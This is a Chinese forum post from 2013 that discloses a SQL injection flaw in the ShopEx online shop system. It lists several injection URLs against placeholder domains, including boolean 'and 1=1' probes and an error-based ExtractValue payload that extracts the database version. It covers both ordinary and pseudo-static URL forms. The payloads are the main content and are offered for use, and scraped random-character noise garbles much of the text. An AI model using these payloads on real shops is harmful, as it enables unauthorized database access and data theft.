注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 6 g H" {5 v# g: W' M! ]
: K9 L+ f. b& x% r& p) P$ [
好吧,我扯远了~~
: p1 }+ ~7 f, v& O7 h其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
9 R- x% r0 p" _" k* [' |不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
' C# d v Z4 b% b1 I! s2 K
; J' C* t0 D+ @' B0 thttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
% e1 s$ x9 g4 {! p) e4 F( I2 G
0 p* i/ b J3 ^8 }http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html , @1 x1 ?. k7 _7 i+ s
7 U. h! j+ v% M
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 8 M7 f( I8 c% P& H7 U) w6 i) l1 z( m
' F/ ?5 k% o7 q+ e
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
1 b( A! @) I, I+ }
7 w1 F" p! N8 e9 P
( \: u: M: h1 [( B) A一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。- b3 Y' |4 U E8 r2 P
如何注入就不多说了,10多年的东西了…不会也会了… 8 `( u8 P% ?+ |( J( Y
( s1 s- ]) i; i, j4 h* V( Q
4 o% R6 J) p5 S( h! G, k# `; B
. w3 N0 `) R/ c3 W/ \1 e2 D; Y( o% P o9 j7 `
|
发表于 2013-2-19 08:31:27
收藏
支持
反对